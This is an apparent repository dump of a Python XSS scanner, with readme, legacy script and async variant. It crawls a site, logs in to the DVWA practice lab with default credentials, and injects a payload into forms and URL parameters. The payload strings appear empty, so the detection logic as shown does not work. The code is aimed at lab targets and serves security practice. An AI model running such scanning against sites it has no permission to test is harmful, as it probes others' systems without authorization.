| for form in forms: 95 | print(f"[+] Testing form in: {link}") 96 | is_vulnerable_to_xss = await self.test_xss_in_form(form=form, url=link) 97 | if is_vulnerable_to_xss: 98 | print(f"\n[***] XSS Discovered in: {link}") 99 | print(form) 100 | print("===================================\n") 101 | 102 | if "=" in link: 103 | print(f"[+] Testing Link: {link}") 104 | is_vulnerable_to_xss = await self.test_xss_in_link(link) 105 | if is_vulnerable_to_xss: 106 | print(f"\n[***] XSS Discovered in: {link}") 107 | 108 | async def test_xss_in_link(self, url): 109 | xss_payload = "" 110 | url = url.replace("=", f"={xss_payload}") 111 | response = await self.client.get(url=url) 112 | return xss_payload in response.text 113 | 114 | async def test_xss_in_form(self, form, url): 115 | xss_payload = "" 116 | response = await self.submit_form(form=form, value=xss_payload, url=url) 117 | return xss_payload in response.text 118 | 119 | async def dvwa_scan(): 120 | target_url = "http://localhost" # dvwa 121 | links_to_ignore = ["http://localhost/logout.php"] 122 | 123 | vuln_scanner = Scanner(url=target_url, ignore_links=links_to_ignore) 124 | login = f"{target_url}/login.php" 125 | token = await vuln_scanner.extract_csrf_token(vuln_scanner.client, url=login) 126 | dvwa_login = { 127 | "username": "admin", 128 | "password": "password", 129 | "Login": "submit", 130 | "user_token": token, 131 | } 132 | await vuln_scanner.client.post(login, data=dvwa_login) 133 | 134 | await vuln_scanner.crawl() 135 | await vuln_scanner.run_scanner() 136 | 137 | async def example_scan(): 138 | target_url = "http://192.168.254.109:2368/" 139 | links_to_ignore = ["http://localhost/logout.php"] 140 | vuln_scanner = Scanner(url=target_url, ignore_links=links_to_ignore) 141 | await vuln_scanner.crawl() 142 | await vuln_scanner.run_scanner() 143 | 144 | if __name__ == "__main__": 145 | # asyncio.run(example_scan()) 146 | asyncio.run(dvwa_scan()) 147 | 148 | """ 149 | This is working but, the async scanner is still better, need to study more about async programming 150 | """ -------------------------------------------------------------------------------- /xss-scanner/docs/xss-scanner.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xj4f/offensivesecurity-python/9da1271cc0e04de44b3535e19221d2a23306de13/xss-scanner/docs/xss-scanner.gif -------------------------------------------------------------------------------- /xss-scanner/legacy/form-extract.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib.parse as urlparse 3 | from bs4 import BeautifulSoup 4 | 5 | def request(url): 6 | try: 7 | return requests.get(url) 8 | except requests.exceptions.ConnectionError: 9 | pass 10 | 11 | target_url = "http://0.0.0.0/vulnerabilities/xss_r/" 12 | response = request(target_url) 13 | 14 | parsed_html = BeautifulSoup(response.content, features="html.parser") 15 | forms_list = parsed_html.findAll("form") 16 | 17 | for form in forms_list: 18 | action = form.get("action") 19 | method = form.get("method") 20 | 21 | post_url = urlparse.urljoin(target_url, action) 22 | print( 23 | f"URL: {post_url} : \n", 24 | "[+] Forms: \n" 25 | f"action: {action}", 26 | f"method: {method}" 27 | ) 28 | 29 | payload = "XSS TEST" 30 | 31 | input_list = form.findAll("input") 32 | post_data = {} 33 | for input in input_list: 34 | input_name = input.get('name') 35 | input_type = input.get('type') 36 | input_value = input.get('value') 37 | if input_type == 'text': 38 | input_value = payload 39 | 40 | print("[+] Inputs") 41 | print( 42 | input_name 43 | ) 44 | post_data[input_name] = input_value 45 | 46 | response = requests.post(post_url,data=post_data) 47 | 48 | """ 49 | Form Extraction: Ok 50 | Post Payload: Not Sure 51 | """ 52 | print( 53 | response.content 54 | ) 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /xss-scanner/readme.md: -------------------------------------------------------------------------------- 1 | # XSS-Scanner 2 | 3 | ## TARGET 4 | 5 | - https://hub.docker.com/r/vulnerables/web-dvwa 6 | ``` 7 | 8 | docker run --rm -it -p 80:80 vulnerables/web-dvwa 9 | Username: admin 10 | Password: password 11 | ``` 12 | 13 | - https://github.com/webpwnized/mutillidae-docker 14 | 15 | 16 | ## USAGE 17 | 18 | ```python 19 | # DVWA TARGET 20 | # docker run --rm -it -p 80:80 vulnerables/web-dvwa 21 | target_url = "http://localhost" # DVWA 22 | links_to_ignore = [ 23 | 'http://localhost/logout.php' 24 | ] 25 | 26 | vuln_scanner = Scanner(url=target_url,ignore_links=links_to_ignore) 27 | login = f"{target_url}/login.php" 28 | token = vuln_scanner.extract_csrf_token(vuln_scanner.session, url=login) 29 | dvwa_login = { 30 | "username": 'admin', 31 | "password": 'password', 32 | "Login": 'submit', 33 | "user_token": token 34 | } 35 | vuln_scanner.session.post(login, data=dvwa_login) 36 | 37 | test_url = "http://localhost/vulnerabilities/xss_r/" 38 | forms = vuln_scanner.extract_forms(test_url) 39 | print(forms) # LIST of forms 40 | 41 | # response = vuln_scanner.submit_form(form=forms[0], value='testtest',url=test_url) 42 | # print(response.text) 43 | 44 | # EXPLOIT XSS in FORMS 45 | # TEST for SINGLE FORM 46 | response = vuln_scanner.test_xss_in_form(form=forms[0], url=test_url) 47 | print(response) 48 | 49 | # EXPLOIT XSS in LINK 50 | # TEST FOR SINGLE LINK 51 | response = vuln_scanner.test_xss_in_link(f"{test_url}?name=test") 52 | print(response) 53 | 54 | # Automated Discovery 55 | vuln_scanner.crawl() 56 | vuln_scanner.run_scanner() 57 | 58 | ``` 59 | ![xss_scanner](./docs/xss-scanner.gif) -------------------------------------------------------------------------------- /xss-scanner/requirements.txt: -------------------------------------------------------------------------------- 1 | beautifulsoup4 2 | requests -------------------------------------------------------------------------------- /xss-scanner/scanner.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib.parse as urlparse 4 | from bs4 import BeautifulSoup 5 | import random 6 | 7 | USER_AGENTS = [ 8 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36", 9 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15; rv:70.0) Gecko/20100101 Firefox/70.0", 10 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36", 11 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0", 12 | ] 13 | 14 | 15 | class Scanner: 16 | def __init__(self, url, ignore_links) -> None: 17 | self.session = requests.Session() 18 | self.set_user_agent() 19 | self.target_url = url 20 | self.target_links = [] 21 | self.ignore_links = ignore_links 22 | self.reports = { 23 | "target": "", 24 | "directory": {"crawl": [], "traversal": []}, 25 | "xss": [{"url": "", "form": "", "payload": ""}], 26 | } 27 | 28 | def set_user_agent(self): 29 | self.session.headers.update({"User-Agent": random.choice(USER_AGENTS)}) 30 | 31 | def extract_links_from(self, url): 32 | response = self.session.get(url) 33 | return re.findall('(?:href=")(.*?)"', response.text) 34 | 35 | def crawl(self, url=None): 36 | if url == None: 37 | url = self.target_url 38 | 39 | href_links = self.extract_links_from(url) 40 | for link in href_links: 41 | parsed_link = urlparse.urljoin(url, link) 42 | 43 | if "#" in parsed_link: 44 | parsed_link = parsed_link.split("#")[0] 45 | 46 | if ( 47 | self.target_url in parsed_link 48 | and parsed_link not in self.target_links 49 | and parsed_link not in self.ignore_links 50 | ): 51 | self.target_links.append(parsed_link) 52 | print(parsed_link) 53 | self.crawl(parsed_link) 54 | 55 | def extract_csrf_token(self, session, url): 56 | response = session.get(url) 57 | soup = BeautifulSoup(response.content, "html.parser") 58 | # ALWAYS CHECK FOR CSRF FIELD this is DVWA 59 | token = soup.find("input", {"name": "user_token"})["value"] 60 | return token 61 | 62 | def extract_forms(self, url): 63 | response = self.session.get(url) 64 | parsed_html = BeautifulSoup(response.content, features="html.parser") 65 | return parsed_html.findAll("form") 66 | 67 | def submit_form(self, form, value, url): 68 | action = form.get("action") 69 | method = form.get("method") 70 | post_url = urlparse.urljoin(url, action) 71 | 72 | input_list = form.findAll("input") 73 | post_data = {} 74 | for input in input_list: 75 | input_name = input.get("name") 76 | input_type = input.get("type") 77 | input_value = input.get("value") 78 | if input_type == "text": 79 | input_value = value 80 | 81 | post_data[input_name] = input_value 82 | if method == "post": 83 | return self.session.post(post_url, data=post_data) 84 | return self.session.get(post_url, params=post_data) 85 | 86 | def run_scanner(self): 87 | for link in self.target_links: 88 | forms = self.extract_forms(link) 89 | 90 | for form in forms: 91 | print(f"[+] Testing form in: {link}") 92 | is_vulnerable_to_xss = self.test_xss_in_form(form=form, url=link) 93 | if is_vulnerable_to_xss: 94 | print(f"\n[***] XSS Discovered in: {link}") 95 | print(form) 96 | print("===================================\n") 97 | 98 | if "=" in link: 99 | print(f"[+] Testing Link: {link}") 100 | is_vulnerable_to_xss = self.test_xss_in_link(link) 101 | if is_vulnerable_to_xss: 102 | print(f"\n[***] XSS Discovered in: {link}") 103 | 104 | def test_xss_in_link(self, url): 105 | xss_payload = "" 106 | url = url.replace("=", f"={xss_payload}") 107 | response = self.session.get(url=url) 108 | return xss_payload in response.text 109 | 110 | def test_xss_in_form(self, form, url): 111 | xss_payload = "" 112 | response = self.submit_form(form=form, value=xss_payload, url=url) 113 | return xss_payload in response.text 114 | 115 | 116 | def dvwa_scan(): 117 | # example attack if there's authentication 118 | # dvwa target 119 | # docker run --rm -it -p 80:80 vulnerables/web-dvwa 120 | target_url = "http://localhost" # dvwa 121 | links_to_ignore = ["http://localhost/logout.php"] 122 | 123 | vuln_scanner = Scanner(url=target_url, ignore_links=links_to_ignore) 124 | login = f"{target_url}/login.php" 125 | token = vuln_scanner.extract_csrf_token(vuln_scanner.session, url=login) 126 | dvwa_login = { 127 | "username": "admin", 128 | "password": "password", 129 | "Login": "submit", 130 | "user_token": token, 131 | } 132 | vuln_scanner.session.post(login, data=dvwa_login) 133 | 134 | # automated discovery 135 | vuln_scanner.crawl() 136 | vuln_scanner.run_scanner() 137 | 138 | 139 | def example_scan(): 140 | # example attack 141 | # if no authentication 142 | target_url = "http://192.168.254.109:2368/" 143 | links_to_ignore = ["http://localhost/logout.php"] 144 | vuln_scanner = Scanner(url=target_url, ignore_links=links_to_ignore) 145 | # automated discovery 146 | vuln_scanner.crawl() 147 | vuln_scanner.run_scanner() 148 | 149 | 150 | if __name__ == "__main__": 151 | dvwa_scan() 152 | # example_scan() 153 | --------------------------------------------------------------------------------